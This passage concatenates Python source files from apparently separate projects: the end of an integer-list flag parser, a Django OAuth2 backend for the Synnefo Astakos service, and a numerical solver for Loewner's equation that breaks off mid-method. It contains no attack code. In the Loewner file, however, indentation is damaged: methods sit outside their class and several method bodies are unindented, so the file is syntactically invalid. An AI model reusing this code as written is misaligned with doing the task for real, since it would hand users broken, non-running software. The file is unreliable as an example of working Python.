        def HandleNonIncreasing():
            if self.on_nonincreasing == IntegerListParser.WARN:
                logging.warning('Integer list %s is not increasing', inp)
            elif self.on_nonincreasing == IntegerListParser.EXCEPTION:
                # Interpolate with '%': unlike logging calls, ValueError does
                # not %-format extra arguments into its message.
                raise ValueError('Integer list %s is not increasing' % inp)

        groups = inp.split(',')
        result = []
        # Track the largest integer seen so far for the increasing-order
        # check. (Comparing against result[-1] was wrong after a range
        # group: it compared an int against a (low, high) tuple.)
        last = None

        for group in groups:
            match = INTEGER_GROUP_REGEXP.match(group)
            if match is None:
                raise ValueError('Invalid integer list %s' % inp)
            elif match.group(2) is None:
                # A single integer.
                val = int(match.group(1))

                if last is not None and val <= last:
                    HandleNonIncreasing()

                result.append(val)
                last = val
            else:
                # A low-high range (inclusive).
                low = int(match.group(1))
                high = int(match.group(3))

                if high <= low or (last is not None and low <= last):
                    HandleNonIncreasing()

                result.append((low, high))
                last = high

        return IntegerList(result)

    def Type(self):
        return 'integer list'
class IntegerListSerializer(flags.ArgumentSerializer):
    """Serialize an IntegerList back to its string form (e.g. '1,3,5-7')."""

    def Serialize(self, il):
        # numbers.Integral matches int and (Python 2) long alike; any other
        # group is a (low, high) range tuple. The former Python 2-only
        # ``long`` check broke this method on Python 3.
        return ','.join([str(val) if isinstance(val, numbers.Integral)
                         else '%s-%s' % (val[0], val[1])
                         for val in il.groups])
def DEFINE_integerlist(name, default, help, on_nonincreasing=None,
                       flag_values=flags.GLOBAL_FLAGS, **args):
    """Register a flag whose value must be an integer list."""
    flags.DEFINE(IntegerListParser(on_nonincreasing=on_nonincreasing),
                 name, default, help, flag_values,
                 IntegerListSerializer(), **args)
|
olgabrani/synnefo | refs/heads/feature-newui-pithos | snf-astakos-app/astakos/oa2/backends/djangobackend.py | 9 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import astakos.oa2.models as oa2_models
from astakos.oa2.backends import base as oa2base
from astakos.oa2.backends import base as errors
from django import http
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from django.core.urlresolvers import reverse
from django.conf.urls.defaults import patterns, url
from django.http import HttpResponseNotAllowed
from django.utils.encoding import smart_str, iri_to_uri
from django.views.decorators.csrf import csrf_exempt
from synnefo.lib import join_urls
from synnefo.util import urltools
import urllib
import logging
logger = logging.getLogger(__name__)
class DjangoViewsMixin(object):
    """Django view entry points that bridge HTTP requests to the OAuth2 backend."""

    def auth_view(self, request):
        # Translate the django request, run the authorization endpoint
        # (without auto-accept), and translate the response back.
        oa2request = self.build_request(request)
        oa2response = self.authorize(oa2request, accept=False)
        return self._build_response(oa2response)

    @csrf_exempt
    def token_view(self, request):
        # The token endpoint is POST-only (per the OAuth2 spec, RFC 6749).
        if request.method != 'POST':
            return HttpResponseNotAllowed(['POST'])

        oa2request = self.build_request(request)
        oa2response = self.grant_token(oa2request)
        return self._build_response(oa2response)
class DjangoBackendORMMixin(object):
    """ORM-backed lookup/delete operations for OAuth2 clients, codes and tokens."""

    def get_client_by_credentials(self, username, password):
        """Return the client matching identifier/secret or raise InvalidClientID."""
        try:
            return oa2_models.Client.objects.get(identifier=username,
                                                 secret=password)
        except oa2_models.Client.DoesNotExist:
            raise errors.InvalidClientID("No such client found")

    def get_client_by_id(self, clientid):
        """Return the client with the given identifier or raise InvalidClientID."""
        try:
            return oa2_models.Client.objects.get(identifier=clientid)
        except oa2_models.Client.DoesNotExist:
            raise errors.InvalidClientID("No such client found")

    def get_authorization_code(self, code):
        """Return the stored authorization code record or raise OA2Error."""
        try:
            return oa2_models.AuthorizationCode.objects.get(code=code)
        except oa2_models.AuthorizationCode.DoesNotExist:
            raise errors.OA2Error("No such authorization code")

    def get_token(self, token):
        """Return the stored token record or raise OA2Error."""
        try:
            return oa2_models.Token.objects.get(code=token)
        except oa2_models.Token.DoesNotExist:
            raise errors.OA2Error("No such token")

    def delete_authorization_code(self, code):
        code.delete()
        # Lazy %-style logging args: the message is only rendered when the
        # INFO level is actually enabled (was eager '%' interpolation).
        logger.info(u'%r deleted', code)

    def delete_token(self, token):
        token.delete()
        logger.info(u'%r deleted', token)

    def check_credentials(self, client, username, secret):
        """Verify that username/secret match the given client record."""
        if not (username == client.get_id() and secret == client.secret):
            raise errors.InvalidAuthorizationRequest("Invalid credentials")
class DjangoBackend(DjangoBackendORMMixin, oa2base.SimpleBackend,
                    DjangoViewsMixin):
    """OAuth2 backend wired into Django: ORM storage, views and URL patterns."""

    code_model = oa2_models.AuthorizationCode.objects
    token_model = oa2_models.Token.objects
    client_model = oa2_models.Client.objects

    def _build_response(self, oa2response):
        """Translate a backend-level response into a django HttpResponse."""
        response = http.HttpResponse()
        response.status_code = oa2response.status
        response.content = oa2response.body
        for key, value in oa2response.headers.iteritems():
            response[smart_str(key)] = smart_str(value)
        return response

    def build_request(self, django_request):
        """Translate a django request into a backend-level Request."""
        params = {
            'method': django_request.method,
            'path': django_request.path,
            'GET': django_request.GET,
            'POST': django_request.POST,
            'META': django_request.META,
            # DEBUG deployments are treated as secure to ease development.
            'secure': settings.DEBUG or django_request.is_secure(),
            #'secure': django_request.is_secure(),
        }
        # TODO: check for valid astakos user
        if django_request.user.is_authenticated():
            params['user'] = django_request.user
        return oa2base.Request(**params)

    def get_url_patterns(self):
        """URL patterns exposing the authorization and token endpoints."""
        _patterns = patterns(
            '',
            url(r'^%s/?$' % join_urls(self.endpoints_prefix,
                                      self.authorization_endpoint.rstrip('/')),
                self.auth_view,
                name='%s_authenticate' % self.id),
            url(r'^%s/?$' % join_urls(self.endpoints_prefix,
                                      self.token_endpoint.rstrip('/')),
                self.token_view,
                name='%s_token' % self.id),
        )
        return _patterns

    def is_uri(self, string):
        """Return True iff *string* passes django's URL validation."""
        validator = URLValidator()
        try:
            validator(string)
        except ValidationError:
            return False
        else:
            return True

    def get_login_uri(self):
        return reverse('login')

    @staticmethod
    def urlencode(params):
        # QueryDict-like objects know how to urlencode themselves.
        if hasattr(params, 'urlencode') and \
                callable(getattr(params, 'urlencode')):
            return params.urlencode()
        # Iterate over a snapshot of the keys: popping and re-inserting
        # entries while iterating the live dict is undefined behavior
        # (and raises RuntimeError on Python 3).
        for k in list(params):
            params[smart_str(k)] = smart_str(params.pop(k))
        return urllib.urlencode(params)

    @staticmethod
    def normalize(url):
        return urltools.normalize(iri_to_uri(url))
class AstakosBackend(DjangoBackend):
    """Astakos-specific backend; currently identical to DjangoBackend."""
    pass
|
ucapdak/loewner | refs/heads/master | main/PythonTools/LoewnerRun.py | 1 | from Constants import *
import matplotlib.pyplot as plt
from subprocess import check_output, CalledProcessError
import matlab.engine
from mpmath import findroot, cot
from cmath import log
from cmath import sqrt as csqrt
from cmath import cos as ccos
from cmath import sin as csin
from math import pi, sin, floor, cos, sqrt
from numpy import empty, column_stack, savetxt, complex128, zeros, linspace, copy, roots, array
from importlib import import_module
plt.style.use('ggplot')
class LoewnerRun:
def __init__(self, index, start_time, final_time, outer_points, inner_points, compile_fortran = True, save_data = True, save_plot = True):
    """Configure a Loewner-equation run for driving function *index*.

    Args:
      index: selects the driving function xi(t) (also used as the module code).
      start_time, final_time: time interval of the run.
      outer_points, inner_points: resolution parameters for the solvers.
      compile_fortran: recompile the Fortran solvers with f2py (side effect).
      save_data, save_plot: whether results are written to dat files / plots.
    """
    # Assign the driving function index
    self.index = index
    # Assign the module code
    self.module_code = str(index)
    # Determine the filename of the relevant Fortran file
    self.forward_filename = FOR_LOEWNER + "/" + FOR_LOEWNER + FORTRAN_EXT
    self.inverse_filename = INV_LOEWNER + "/" + INV_LOEWNER + FORTRAN_EXT
    # Set a filename for the compiled module
    self.forward_module_name = "modules." + FOR_LOEWNER + "_" + self.module_code
    self.inverse_module_name = "modules." + INV_LOEWNER
    # Set the data-saving parameters
    self.save_data = save_data
    self.save_plot = save_plot
    # Set the time and resolution parameters
    self.start_time = start_time
    self.final_time = final_time
    self.outer_points = outer_points
    self.inner_points = inner_points
    # Create a null variable for the quadratic forward results (used by
    # quadratic_inverse_loewner to check the forward algorithm has run).
    # BUG FIX: this was misspelled 'forward_resuls', so the inverse
    # algorithm's guard raised AttributeError instead of its error message.
    self.forward_results = None
    # Set the compilation parameter
    self.compile_fortran = compile_fortran
    # Compile the modules (Not necessary unless the Fortran files have changed since last compilation)
    if compile_fortran:
        self.compile_modules()
    # Declare constants used in special driving function cases
    self.constant = 0
    self.kappa = 0
    self.alpha = 0
    # Obtain the names and lambda function for the given driving function
    if index == 2:
        self.name = "cos(t)"
        self.latex_name = "$\\xi (t) = \cos(t)$"
        self.xi = lambda t: cos(t)
    elif index == 3:
        self.name = "t * cos(t)"
        self.latex_name = "$\\xi (t) = t \ \cos(t)$"
        self.xi = lambda t: t * cos(t)
    elif index == 4:
        self.name = "cos(t * pi)"
        self.latex_name = "$\\xi (t) = \cos(\pi t)$"
        self.xi = lambda t: cos(pi * t)
    elif index == 5:
        self.name = "t * cos(t * pi)"
        self.latex_name = "$\\xi (t) = t \ \cos(\pi t)$"
        self.xi = lambda t: t * cos(pi * t)
    elif index == 6:
        self.name = "sin(t)"
        self.latex_name = "$\\xi (t) = \sin(t)$"
        self.xi = lambda t: sin(t)
    elif index == 7:
        self.name = "t * sin(t)"
        self.latex_name = "$\\xi (t) = t \ \sin(t)$"
        self.xi = lambda t: t * sin(t)
    elif index == 8:
        self.name = "sin(t * pi)"
        self.latex_name = "$\\xi (t) = \sin(\pi t)$"
        self.xi = lambda t: sin(pi * t)
    elif index == 9:
        self.name = "t * sin(t * pi)"
        self.latex_name = "$\\xi (t) = t \ \sin(\pi t)$"
        self.xi = lambda t: t * sin(pi * t)
    elif index == 12:
        self.name = "floor(t)"
        self.latex_name = "$\\xi (t) = \lfloor t \\rfloor $"
        self.xi = lambda t: floor(t)
    elif index == 13:
        # Display-name typo fixed: was "floot(t) % 2".
        self.name = "floor(t) % 2"
        self.latex_name = "$\\xi (t) = \lfloor t \\rfloor \ \\mathrm{mod} \ 2$"
        self.xi = lambda t: floor(t) % 2
    # Create the properties string (Used for creating filenames)
    if not SQUAREROOT_DRIVING(index):
        self.set_properties_string()
        self.set_short_properties_string()
    # Construct the exact solution for time
    self.exact_time_sol = linspace(self.start_time, self.final_time, self.outer_points)
def set_properties_string(self):
# Place the parameters of the run into a list
properties = [self.index, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.properties_string = "-".join(desc)
def set_short_properties_string(self):
# Place the parameters of the run into a list
properties = [self.index, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points]
# Convert the parameters to strings
desc = [str(attr) for attr in properties]
# Create a single string to use as a filename template
self.short_properties_string = "-".join(desc)
def number_to_string(self, num):
    """Format *num* for use in a filename.

    The number is rendered with 5 decimal places, excess trailing zeroes
    (and a dangling decimal point) are removed, and any remaining '.' is
    spelled out as 'point' so the result cannot confuse the filesystem.
    E.g. 12.5 -> '12point5', 3.0 -> '3'.
    """
    num_str = ("%8.5f" % num).strip()
    # rstrip replaces the former character-by-character trim loop:
    # drop trailing zeroes, then a bare trailing decimal point
    # (e.g. "12.50000" -> "12.5", "12.00000" -> "12").
    num_str = num_str.rstrip("0").rstrip(".")
    # Put the word point in place of the decimal point.
    return num_str.replace(".", "point")
def compile_modules(self):
    """Compile the forward and inverse Fortran solvers into importable
    Python modules via f2py; exits the process on compilation failure."""
    # Create a string that is used to compile the forward fortran file with f2py
    # (-DCASE selects the driving function at compile time).
    self.compile_forward = F2PY_FIRST + ["-DCASE=" + self.module_code] \
        + [self.forward_filename, "-m", \
           self.forward_module_name]
    # Create a string that is used to compile the inverse fortran file with f2py
    self.compile_inverse = F2PY_FIRST \
        + [self.inverse_filename, "-m", \
           self.inverse_module_name]
    # Iterate through the modules
    for command in [self.compile_forward, self.compile_inverse]:
        # Attempt to compile the module
        try:
            check_output(command)
        # Display an error if the module could not be compiled (Typically means there is a problem in the Fortran code)
        except CalledProcessError:
            print("Error: Could not compile module " + " ".join(command))
            exit()
def save_to_dat(self, filename, results_array):
    """Write *results_array* to *filename* using the project's precision format."""
    # Save the results to a dat file
    savetxt(filename, results_array, fmt=DATA_PREC)
def set_plot_title(self):
    """Use the driving function's LaTeX name as the current plot title."""
    # Prepare the plot title
    plt.title(self.latex_name, fontsize = 19, color = "black", y = 1.02, usetex = True)
def quadratic_forward_plot(self):
    """Plot the quadratic forward trace in the complex plane and save it."""
    # Plot the values
    plt.plot(self.forward_results.real, self.forward_results.imag, color='crimson')

    # Set the axes labels
    plt.xlabel(FOR_PLOT_XL)
    plt.ylabel(FOR_PLOT_YL)

    # Set the lower limit of the y-axis (traces live in the upper half-plane)
    plt.ylim(bottom=0)

    # Save the plot to the filesystem
    plt.savefig(FORWARD_PLOT_OUTPUT + self.properties_string + PLOT_EXT, bbox_inches='tight')
def quadratic_inverse_plot(self,exact=False):
    """Plot the recovered driving function against time and save it.

    When *exact* is True, the exact (analytic) solution arrays and the
    short filename template are used instead of the numerical ones.
    """
    # Decide whether the numerical or exact solution is plotted
    if exact is False:
        time_arr = self.time_arr
        driving_arr = self.driving_arr
        properties = self.properties_string
        output = INVERSE_PLOT_OUTPUT
    else:
        time_arr = self.exact_time_sol
        driving_arr = self.exact_driving_arr
        properties = self.short_properties_string
        output = EXACT_INVERSE_PLOT_OUTPUT

    # Plot the values
    plt.plot(time_arr, driving_arr, color='crimson')

    # Set the axes labels
    plt.xlabel(INV_PLOT_XL)
    plt.ylabel(INV_PLOT_YL)

    # Set the lower limit of the x-axis
    plt.xlim(left=self.start_time)

    # Save the plot to the filesystem
    plt.savefig(output + properties + PLOT_EXT, bbox_inches='tight')
def cubic_forward_plot(self):
    """Plot both traces of the cubic run and save the figure."""
    # Plot the values (the cubic algorithm produces two trace branches)
    plt.plot(self.cubic_results_a.real, self.cubic_results_a.imag, color='crimson')
    plt.plot(self.cubic_results_b.real, self.cubic_results_b.imag, color='crimson')

    # Set the axes labels
    plt.xlabel(FOR_PLOT_XL)
    plt.ylabel(FOR_PLOT_YL)

    # Set the lower limit of the y-axis
    plt.ylim(bottom=0)

    # Save the plot to the filesystem
    plt.savefig(CUBIC_PLOT_OUTPUT + self.properties_string + PLOT_EXT, bbox_inches='tight')
def finger_growth_plot(self):
    """Plot both branches of the finger-growth run and save the figure."""
    # Plot the values
    plt.plot(self.finger_results_a.real, self.finger_results_a.imag, color='crimson')
    plt.plot(self.finger_results_b.real, self.finger_results_b.imag, color='crimson')

    # Set the axes labels
    plt.xlabel(FOR_PLOT_XL)
    plt.ylabel(FOR_PLOT_YL)

    # Set the lower limit of the y-axis
    plt.ylim(bottom=0)

    # Save the plot to the filesystem (short template: no inner resolution)
    plt.savefig(FINGER_PLOT_OUTPUT + self.short_properties_string + PLOT_EXT, bbox_inches='tight')
def wedge_growth_plot(self, wedge_properties_string):
    """Plot the wedge-growth trace; *wedge_properties_string* names the file."""
    # Plot the values
    plt.plot(self.wedge_results.real, self.wedge_results.imag, color='crimson')

    # Set the axes labels
    plt.xlabel(FOR_PLOT_XL)
    plt.ylabel(FOR_PLOT_YL)

    # Set the lower limit of the y-axis
    plt.ylim(bottom=0)

    # Save the plot to the filesystem
    plt.savefig(WEDGE_PLOT_OUTPUT + wedge_properties_string + PLOT_EXT, bbox_inches='tight')
def quadratic_forward_loewner(self):
    """Solve the quadratic Loewner equation with the compiled module.

    Stores the trace in self.forward_results and, depending on the
    save_data / save_plot flags, writes a dat file and a plot.
    """
    # Import the compiled Forward Loewner module (one module per driving
    # function -- the name is held in self.forward_module_name)
    ForwardLoewner = import_module(self.forward_module_name)
    # Declare an empty complex array for the results
    self.forward_results = empty(self.outer_points, dtype=complex128)
    # Solve Loewner's equation with the given parameters. Arguments are
    # positional here: start time, final time, inner points, result array
    # (filled in place by the compiled routine).
    ForwardLoewner.quadraticloewner(self.start_time, self.final_time, self.inner_points, self.forward_results)
    if self.save_data:
        # Convert the results to a 2D array of (real, imag) columns
        results_array = column_stack((self.forward_results.real, self.forward_results.imag))
        # Create a filename for the dat file
        filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
        # Save the array to the filesystem
        self.save_to_dat(filename, results_array)
    if self.save_plot:
        # Clear any preexisting plots to be safe
        plt.cla()
        # Set the plot title
        self.set_plot_title()
        # Plot the data and save it to the filesystem
        self.quadratic_forward_plot()
def quadratic_inverse_loewner(self):
    """Run the inverse algorithm on the quadratic forward results.

    Requires quadratic_forward_loewner() to have been executed first;
    aborts the program with a non-zero exit status otherwise. Stores
    the recovered time and driving-function arrays and optionally
    writes a dat file and a plot.
    """
    import sys
    # The inverse algorithm consumes the forward trace, so it must exist.
    if self.forward_results is None:
        # sys.exit(message) writes to stderr and exits with status 1;
        # the previous print + exit() reported the failure on stdout and
        # exited with status 0 (success).
        sys.exit("Error: No quadratic forward results to use for inverse algorithm.")
    # Import the compiled Inverse Loewner module
    InverseLoewner = import_module(self.inverse_module_name)
    # Declare empty arrays for the time and driving function values
    self.driving_arr = empty(self.outer_points, dtype=float)
    self.time_arr = empty(self.outer_points, dtype=float)
    # Carry out the inverse algorithm using the results of the forward
    # run (both output arrays are filled in place)
    InverseLoewner.inverseloewner(self.forward_results, self.driving_arr, self.time_arr, self.outer_points)
    if self.save_data:
        # Convert the results to a 2D array of (time, driving) columns
        results_array = column_stack((self.time_arr, self.driving_arr))
        # Create a filename for the dat file
        filename = INVERSE_DATA_OUTPUT + self.properties_string + DATA_EXT
        # Save the array to the filesystem
        self.save_to_dat(filename, results_array)
    if self.save_plot:
        # Clear any preexisting plots to be safe
        plt.cla()
        # Set the plot title
        self.set_plot_title()
        # Plot the data and save it to the filesystem
        self.quadratic_inverse_plot()
def exact_inverse(self):
    """Evaluate the driving function exactly over the exact time mesh,
    optionally saving the data and a plot."""
    # Evaluate xi(t) at each exact time value and store as an array
    exact_vals = [self.xi(t) for t in self.exact_time_sol]
    self.exact_driving_arr = array(exact_vals)
    if self.save_data:
        # Pair each time value with its driving value and write a dat file
        results_array = column_stack((self.exact_time_sol, self.exact_driving_arr))
        out_name = EXACT_INVERSE_DATA_OUTPUT + self.short_properties_string + DATA_EXT
        self.save_to_dat(out_name, results_array)
    if self.save_plot:
        # Start from clean axes, title the figure, then draw and save
        plt.cla()
        self.set_plot_title()
        self.quadratic_inverse_plot(exact=True)
def cubic_forward_loewner(self):
    """Solve the cubic Loewner equation with the compiled module,
    storing both traces and optionally saving data and a plot."""
    # Import the compiled Forward Loewner module
    ForwardLoewner = import_module(self.forward_module_name)
    # Allocate complex result arrays for the two traces
    self.cubic_results_a = empty(self.outer_points, dtype=complex128)
    self.cubic_results_b = empty(self.outer_points, dtype=complex128)
    # Run the cubic algorithm (result arrays are filled in place)
    ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b)
    if self.save_data:
        # Write one dat file per trace, suffixed -A and -B
        for suffix, trace in (("-A", self.cubic_results_a), ("-B", self.cubic_results_b)):
            out_name = CUBIC_DATA_OUTPUT + self.properties_string + suffix + DATA_EXT
            self.save_to_dat(out_name, column_stack((trace.real, trace.imag)))
    if self.save_plot:
        # Start from clean axes, title the figure, then draw and save
        plt.cla()
        self.set_plot_title()
        self.cubic_forward_plot()
def finger_growth(self):
    """Compute two finger-growth traces by time-stepping an implicit
    update, solving each step with the secant method.

    Populates self.finger_results_a / self.finger_results_b and,
    depending on the save flags, writes dat files and a plot.
    """
    # Declare empty complex arrays for the results
    self.finger_results_a = empty(self.outer_points, dtype=complex128)
    self.finger_results_b = empty(self.outer_points, dtype=complex128)
    # Evaluate the driving function at every exact time value
    xi_sol = [self.xi(t) for t in self.exact_time_sol]
    # Seed the two traces with +/- the initial driving value
    self.finger_results_a[0] = xi_sol[0]
    self.finger_results_b[0] = -xi_sol[0]
    # Define a 'weight' for the equation
    d = 1
    # Time step of the mesh (assumes exact_time_sol[0] == 0 and a uniform
    # spacing, so the second entry equals delta t -- TODO confirm)
    delta_t = self.exact_time_sol[1]
    # Small imaginary offset used to form the initial secant guess
    increment = delta_t * 1j
    # Residual of the implicit update: zero when g_current satisfies the
    # discretised finger-growth equation given the previous value
    def f(g_current, g_previous, xi_t):
        return delta_t * d * HALF_PI * ccos(HALF_PI * g_current) + (g_current - g_previous)*(csin(HALF_PI * g_current) - csin(HALF_PI * xi_t))
    # First step: start the secant iteration from a point nudged off the
    # seed value (the imaginary increment) so the iterates differ
    self.finger_results_a[1] = findroot(lambda g: f(g, self.finger_results_a[0], xi_sol[0]), self.finger_results_a[0] + increment, solver='secant', tol=TOL)
    self.finger_results_b[1] = findroot(lambda g: f(g, self.finger_results_b[0], -xi_sol[0]), self.finger_results_b[0] + increment, solver='secant', tol=TOL)
    # Remaining steps: each secant iteration is seeded with the previous
    # solution, which is close to the next one for small delta t
    for i in range(2,self.outer_points):
        self.finger_results_a[i] = findroot(lambda g: f(g, self.finger_results_a[i - 1], xi_sol[i]), self.finger_results_a[i - 1], solver='secant', tol=TOL)
        self.finger_results_b[i] = findroot(lambda g: f(g, self.finger_results_b[i - 1], -xi_sol[i]), self.finger_results_b[i - 1], solver='secant', tol=TOL)
    if self.save_data:
        # Create filenames for the dat files (one per trace)
        filename_a = FINGER_DATA_OUTPUT + self.short_properties_string + "-A" + DATA_EXT
        filename_b = FINGER_DATA_OUTPUT + self.short_properties_string + "-B" + DATA_EXT
        # Create 2D arrays from the real and imaginary values of the results
        array_a = column_stack((self.finger_results_a.real, self.finger_results_a.imag))
        array_b = column_stack((self.finger_results_b.real, self.finger_results_b.imag))
        # Save the arrays to the filesystem
        self.save_to_dat(filename_a, array_a)
        self.save_to_dat(filename_b, array_b)
    if self.save_plot:
        # Clear any preexisting plots to be safe
        plt.cla()
        # Set the plot title
        self.set_plot_title()
        # Plot the data and save it to the filesystem
        self.finger_growth_plot()
def wedge_growth(self, wedge_alpha):
    """Solve the wedge case of Loewner's equation via the Matlab engine.

    wedge_alpha -- wedge angle parameter handed to the Matlab solver.
    Populates self.wedge_results and, depending on the save flags,
    writes a dat file and a plot.
    """
    # Declare empty complex arrays for the results
    self.wedge_results = empty(self.outer_points, dtype=complex128)
    # Start the Matlab engine
    eng = matlab.engine.start_matlab()
    # Declare variables in the Matlab workspace for solving Loewner's equation
    eng.workspace['index'] = self.index
    eng.workspace['start_time'] = self.start_time
    eng.workspace['final_time'] = self.final_time
    eng.workspace['outer_points'] = self.outer_points
    eng.workspace['inner_points'] = self.inner_points
    eng.workspace['wedge_alpha'] = wedge_alpha
    eng.workspace['fast'] = 0 # Use the 'slow' mode because parfor loops don't seem to work within the Matlab engine for Python :(
    # Declare parameters for the 'special' driving functions
    eng.workspace['constant'] = self.constant
    eng.workspace['kappa'] = self.kappa
    # Instruct the workspace to look for files in the Wedge directory
    eng.eval('addpath("WedgeLoewner")')
    # Carry out the algorithm for solving the wedge case of Loewner's equation
    wedge_result = eng.eval('SolveWedgeLoewner(index,start_time,final_time,inner_points,outer_points,wedge_alpha,fast,constant,kappa)',nargout=1)
    # Stop the Matlab engine once the function returns
    eng.quit()
    # Copy the Matlab data into the numpy array element by element
    for i in range(self.outer_points):
        self.wedge_results[i] = wedge_result[0][i]
    # Represent the alpha value as a string
    alpha_string = self.number_to_string(wedge_alpha)
    # Create a properties string for the run (includes the alpha value,
    # so the superclass properties string is not reused here)
    wedge_properties_string = "-".join([str(attr) for attr in [self.index, alpha_string, self.number_to_string(self.start_time), self.number_to_string(self.final_time), self.outer_points, self.inner_points]])
    if self.save_data:
        # Create a filename for the dat file
        filename = WEDGE_DATA_OUTPUT + wedge_properties_string + DATA_EXT
        # Create a 2D array from the real and imaginary values of the results
        results_array = column_stack((self.wedge_results.real, self.wedge_results.imag))
        # Save the array to the filesystem
        self.save_to_dat(filename, results_array)
    if self.save_plot:
        # Clear any preexisting plots to be safe
        plt.cla()
        # Set the plot title
        self.set_plot_title()
        # Plot the data and save it to the filesystem
        self.wedge_growth_plot(wedge_properties_string)
class ConstantLoewnerRun(LoewnerRun):
    """Loewner run for a constant driving function xi(t) = constant."""
    def __init__(self, constant, start_time, final_time, outer_points, inner_points, compile_modules = True, save_data = True, save_plot = True):
        # Invoke the superclass initialiser
        LoewnerRun.__init__(self, CONST_IDX, start_time, final_time, outer_points, inner_points, compile_modules, save_data, save_plot)
        # Set the constant value
        self.constant = constant
        # Set the names and lambda function for the given driving function
        self.name = "Constant"
        self.latex_name = "$\\xi (t) = " + str(self.constant) + "$"
        self.xi = lambda t: self.constant
        # Set the latex name for the exact cubic case (uses the particular
        # constant EXACT_CUBIC_CONSTANT rather than self.constant)
        self.exact_cubic_latex_name = "$\\xi (t) = " + str(EXACT_CUBIC_CONSTANT) + "$"
    def quadratic_forward_loewner(self):
        """Solve the quadratic Loewner equation, passing the constant to
        the compiled module as a keyword argument."""
        # Import the compiled Forward Loewner module
        ForwardLoewner = import_module(self.forward_module_name)
        # Declare an empty complex array for the results
        self.forward_results = empty(self.outer_points, dtype=complex128)
        # Solve Loewner's equation with the given parameters (result array
        # is filled in place)
        ForwardLoewner.quadraticloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresult=self.forward_results, constantdrivingarg=self.constant)
        if self.save_data:
            # Create a filename for the dat file
            filename = FORWARD_DATA_OUTPUT + self.properties_string + DATA_EXT
            # Create a 2D array from the real and imaginary values of the results
            results_array = column_stack((self.forward_results.real, self.forward_results.imag))
            # Save the array to the filesystem
            self.save_to_dat(filename, results_array)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the data and save it to the filesystem
            self.quadratic_forward_plot()
    def cubic_forward_loewner(self):
        """Solve the cubic Loewner equation for the constant driving function."""
        # Import the compiled Forward Loewner module
        ForwardLoewner = import_module(self.forward_module_name)
        # Declare empty complex arrays for the results
        self.cubic_results_a = empty(self.outer_points, dtype=complex128)
        self.cubic_results_b = empty(self.outer_points, dtype=complex128)
        # Solve Loewner's equation with the given parameters
        ForwardLoewner.cubicloewner(outerstarttime=self.start_time, outerfinaltime=self.final_time, innern=self.inner_points, zresulta=self.cubic_results_a, zresultb=self.cubic_results_b, constdrivingarg=self.constant)
        if self.save_data:
            # Create filenames for the data files (one per trace)
            filename_a = CUBIC_DATA_OUTPUT + self.properties_string + "-A" + DATA_EXT
            filename_b = CUBIC_DATA_OUTPUT + self.properties_string + "-B" + DATA_EXT
            # Create 2D arrays from the real and imaginary values of the results
            array_a = column_stack((self.cubic_results_a.real,self.cubic_results_a.imag))
            array_b = column_stack((self.cubic_results_b.real,self.cubic_results_b.imag))
            # Save the arrays to the filesystem
            self.save_to_dat(filename_a, array_a)
            self.save_to_dat(filename_b, array_b)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set the plot title
            self.set_plot_title()
            # Plot the data and save it to the filesystem
            self.cubic_forward_plot()
    def exact_cubic_forward_loewner(self):
        """Compute the exact cubic solution by solving a nonlinear equation
        with Muller's method at each exact time value, then optionally
        save the data and a plot."""
        # Declare empty complex arrays for the exact results
        self.exact_cubic_sol_a = zeros(self.outer_points, dtype = complex128)
        self.exact_cubic_sol_b = zeros(self.outer_points, dtype = complex128)
        # Define a function for generating an initial guess to be used by the non-linear solver
        def initial_guess(t):
            return 1 + 1j * sqrt(2*t) - (1./3) * t
        # Define the non-linear function for obtaining the exact solution
        # (its root at time t is the exact trace point)
        def exact_solution(z,t):
            return z**2 - 2*log(z) - 1 + 4*t
        # Iterate through the exact time values
        for i in range(self.outer_points):
            # Use Muller's method for finding the exact solution
            self.exact_cubic_sol_a[i] = findroot(lambda z: exact_solution(z, self.exact_time_sol[i]), initial_guess(self.exact_time_sol[i]), solver='muller', tol=TOL)
            # Obtain the solution to the second trace by changing the sign of the real component
            self.exact_cubic_sol_b[i] = -self.exact_cubic_sol_a[i].real + self.exact_cubic_sol_a[i].imag * 1j
        if self.save_data:
            # Create filenames for the dat files (one per trace)
            filename_a = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-A" + DATA_EXT
            filename_b = EXACT_CUBIC_DATA_OUTPUT + self.short_properties_string + "-B" + DATA_EXT
            # Create 2D arrays from the real and imaginary values of the results
            array_a = column_stack((self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag))
            array_b = column_stack((self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag))
            # Save the arrays to the filesystem
            self.save_to_dat(filename_a, array_a)
            self.save_to_dat(filename_b, array_b)
        if self.save_plot:
            # Clear any preexisting plots to be safe
            plt.cla()
            # Set a new plot title for the exact solution case (uses the
            # particular constant EXACT_CUBIC_CONSTANT)
            plt.title(self.exact_cubic_latex_name, fontsize = 19, color = "black", y = 1.02, usetex = True)
            # Plot the values
            plt.plot(self.exact_cubic_sol_a.real, self.exact_cubic_sol_a.imag, color='crimson')
            plt.plot(self.exact_cubic_sol_b.real, self.exact_cubic_sol_b.imag, color='crimson')
            # Set the axes labels
            plt.xlabel(FOR_PLOT_XL)
            plt.ylabel(FOR_PLOT_YL)
            # Set the lower limit of the y-axis
            plt.ylim(bottom=0)
            # Save the plot to the filesystem
